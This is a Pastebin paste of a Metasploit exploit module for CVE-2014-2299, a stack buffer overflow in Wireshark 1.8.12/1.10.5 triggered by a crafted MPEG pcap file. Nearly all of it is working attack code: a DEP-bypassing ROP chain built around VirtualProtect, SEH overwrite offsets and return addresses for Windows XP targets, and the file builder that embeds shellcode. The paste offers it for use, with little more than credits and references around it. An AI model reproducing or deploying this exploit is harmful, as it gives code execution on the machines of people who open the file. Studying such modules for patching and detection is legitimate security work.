Advertisement
Guest User

Buffer overflow Wireshark 1.8.12/1.10.5

a guest
May 2nd, 2014
841
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.78 KB | None | 0 0
  1. X-SYSTEM
  2.  
  3.  
  4. Vuln. Buffer Overflow in wireshark 1.8.12/1.10.5
  5.  
  6.  
  7. S.C.R.I.P.T ↓ :
  8.  
  9. # Exploit Title: Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer
  10. Overflow
  11. # Date: 24/04/2014
  12. # Exploit Author: j0sm1
  13. # Vendor Homepage: www.wireshark.org
  14. # Software Link: http://wireshark.askapache.com/download/win32/all-versions/
  15. # Version: < 1.8.12/1.10.5
  16. # Tested on: Windows XP SP3
  17. # CVE : cve-2014-2299
  18.  
  19. # Metasploit URL module:
  20. https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb
  21.  
  22. #
  23. # This module requires Metasploit: http//metasploit.com/download
  24. # Current source: https://github.com/rapid7/metasploit-framework
  25. ##
  26.  
  27. require 'msf/core'
  28.  
  29. class Metasploit3 < Msf::Exploit::Remote
  30. Rank = GoodRanking
  31.  
  32. include Msf::Exploit::FILEFORMAT
  33. include Msf::Exploit::Remote::Seh
  34.  
  35. def initialize(info = {})
  36. super(update_info(info,
  37. 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',
  38. 'Description' => %q{
  39. This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
  40. by generating an malicious file.)
  41. },
  42. 'License' => MSF_LICENSE,
  43. 'Author' =>
  44. [
  45. 'Wesley Neelen', # Discovery vulnerability
  46. 'j0sm1', # Exploit and msf module
  47. ],
  48. 'References' =>
  49. [
  50. [ 'CVE', '2014-2299'],
  51. [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],
  52. [ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],
  53. [ 'URL', 'http://www.securityfocus.com/bid/66066/info' ]
  54. ],
  55. 'DefaultOptions' =>
  56. {
  57. 'EXITFUNC' => 'process',
  58. },
  59. 'Payload' =>
  60. {
  61. 'BadChars' => "\xff",
  62. 'Space' => 600,
  63. 'DisableNops' => 'True',
  64. 'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200
  65. },
  66. 'Platform' => 'win',
  67. 'Targets' =>
  68. [
  69. [ 'WinXP SP3 Spanish (bypass DEP)',
  70. {
  71. 'OffSet' => 69732,
  72. 'OffSet2' => 70476,
  73. 'Ret' => 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)
  74. 'jmpesp' => 0x68e2bfb9,
  75. }
  76. ],
  77. [ 'WinXP SP2/SP3 English (bypass DEP)',
  78. {
  79. 'OffSet2' => 70692,
  80. 'OffSet' => 70476,
  81. 'Ret' => 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module
  82. 'jmpesp' => 0x68e2bfb9,
  83. }
  84. ],
  85. ],
  86. 'Privileged' => false,
  87. 'DisclosureDate' => 'Mar 20 2014'
  88. ))
  89.  
  90. register_options(
  91. [
  92. OptString.new('FILENAME', [ true, 'pcap file', 'mpeg_overflow.pcap']),
  93. ], self.class)
  94. end
  95.  
  96. def create_rop_chain()
  97.  
  98. # rop chain generated with mona.py - www.corelan.be
  99. rop_gadgets =
  100. [
  101. 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
  102. 0x62d9027c, # ptr to &VirtualProtect() [IAT libcares-2.dll]
  103. 0x61970969, # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
  104. 0x61988cf6, # XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
  105. 0x619c0a2a, # POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
  106. 0x61841e98, # & push esp # ret [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
  107. 0x6191d11a, # POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
  108. 0x00000201, # 0x00000201-> ebx
  109. 0x5a4c1414, # POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]
  110. 0x00000040, # 0x00000040-> edx
  111. 0x6197660f, # POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
  112. 0x668242b9, # &Writable location [libgnutls-26.dll]
  113. 0x6199b8a5, # POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0
  114. 0x63a528c2, # RETN (ROP NOP) [libgobject-2.0-0.dll]
  115. 0x61863c2a, # POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
  116. 0x90909090, # nop
  117. 0x6199652d, # PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]
  118. ].flatten.pack("V*")
  119.  
  120. return rop_gadgets
  121.  
  122. end
  123.  
  124. def exploit
  125.  
  126. print_status("Creating '#{datastore['FILENAME']}' file ...")
  127.  
  128. ropchain = create_rop_chain
  129. magic_header = "\xff\xfb\x41" # mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure
  130. # Here we build the packet data
  131. packet = rand_text_alpha(883)
  132. packet << "\x6c\x7d\x37\x6c" # NOP RETN
  133. packet << "\x6c\x7d\x37\x6c" # NOP RETN
  134. packet << ropchain
  135. packet << payload.encoded # Shellcode
  136. packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)
  137.  
  138. # 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000
  139. # After nseh and seh we haven't space, then we have to jump to another location.
  140.  
  141. # When file is open with command line. This is NSEH/SEH overwrite
  142. packet << make_nops(4) # nseh
  143. packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN
  144.  
  145. packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk
  146.  
  147. # When file is open with GUI interface. This is NSEH/SEH overwrite
  148. packet << make_nops(4) # nseh
  149. # seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] **
  150. packet << "\x55\x59\x80\x6b"
  151.  
  152. print_status("Preparing payload")
  153. filecontent = magic_header
  154. filecontent << packet
  155. print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")
  156. file_create(filecontent)
  157.  
  158. end
  159. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement